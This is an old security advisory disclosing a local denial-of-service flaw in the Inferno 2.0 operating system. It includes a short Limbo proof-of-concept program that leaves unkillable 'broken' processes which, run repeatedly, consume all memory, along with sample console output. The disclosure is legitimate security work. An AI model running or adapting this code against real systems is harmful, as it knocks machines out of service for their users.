- J.J.F. / Hackers Team - Security Advisory =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Date: 1/18/1999 Author: Conde Vampiro URL: http://www.jjf.org Aplication: Operating System: Inferno 2.0 over Windows platform. (It may also affect all other platforms running Inferno.) Danger: A user can produce a DoS (Denial of Service) in its own memory. -=-=-=-=-=-=-=-= Introduction -=-=-=-=-=-=-=-= A program written in Limbo can produce a denial of service consuming all the memory of the computer. Althrough the Inferno's commands to prevent this DoS are not able to stop this attack. -=-=-=-=-=-=-=-= In Detail -=-=-=-=-=-=-=-= Using the following program written in Limbo, we can consume all the memory of the platform we are running Inferno. ------------ Source Code --------------------------------------------------- # # FILE: killmen.b # DATE: 11/10/98 # CODER: Conde Vampiro of - J.J.F. / Hackers Team - # ABSTRACT: A DoS (Denial of service) in Limbo for Inferno O.S # # http://www.jjf.org - J.J.F. / Hackers Team - implement killmen; include "sys.m"; sys: Sys; include "draw.m"; i : int; men : con "DoS by Conde Vampiro"; died := array[0] of int; kill := array[0] of int; killmen: module { init: fn(ctxt: ref Draw-> Context, nil: list of string); }; init (ctxt: ref Draw-> Context, nil: list of string) { sys = load Sys Sys->PATH; sys->print("%s\n\n", men); for (i:=0;i<100;i++) { died[i]=kill[i]; } } ------------ EOF ------------------------------------------------------------- If a user execute this program on an Inferno console, it will produce the following error: colmillo$ killmen DoS by Conde Vampiro [killmen] Broken: "array bounds error" 17 "killmen":array bounds error colmillo$ We can observe that the program "killmen" has produce an error and the shell tells us it's pid, in this case 17. If we execute the 'ps' command, it will show the following result: colmillo$ ps 1 1 Conde Vampiro release 1K Sh[$Sys] 6 6 inferno alt 19K Wm 7 6 inferno release 4K Wm[$Sys] 8 6 inferno release 4K Wm[$Sys] 11 10 inferno recv 16K Plumb 12 10 inferno alt 16K Plumb 13 10 inferno alt 16K Plumb 17 1 Conde Vampiro broken 10K killmen 18 1 Conde Vampiro ready 1K Ps[$Sys] colmillo$ The program "killmen" it's still remainning in memory, althrough it has produce an error. If we execute this program for a while, it will consume all the memory, this can be easely done using Mash, the shell script of Inferno. If the administrator has not execute the Inferno window interface or has not done the bind of the 'ps' command to the /prog directory, the "killmen" program will be hidden and the 'ps' will not show the processes in memory, but they are there. The 'slayer' command is used to kill "broken" processes but it will not kill "killmen". If we go to /prog directory we can see all the processes as files: colmillo$ cd /prog colmillo$ ls -l dr-xr-xr-x p 0 Conde Vampiro Conde Vampiro 0 Jan 18 17:53 1 dr-xr-xr-x p 0 inferno Conde Vampiro 0 Jan 18 17:53 11 dr-xr-xr-x p 0 inferno Conde Vampiro 0 Jan 18 17:53 12 dr-xr-xr-x p 0 inferno Conde Vampiro 0 Jan 18 17:53 13 dr-xr-xr-x p 0 Conde Vampiro Conde Vampiro 0 Jan 18 17:53 17 dr-xr-xr-x p 0 Conde Vampiro Conde Vampiro 0 Jan 18 17:53 22 dr-xr-xr-x p 0 inferno Conde Vampiro 0 Jan 18 17:53 6 dr-xr-xr-x p 0 inferno Conde Vampiro 0 Jan 18 17:53 7 dr-xr-xr-x p 0 inferno Conde Vampiro 0 Jan 18 17:53 8 colmillo$ The 17 and 22 processes are the "killmen" program that are in memory and every time the program is executed it will create a new "broken" process in memory. -=-=-=-=-=-=-=-= Byes All conde@jjf.org http://www.jjf.org - J.J.F. / Hackers Team - Security Advisory =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=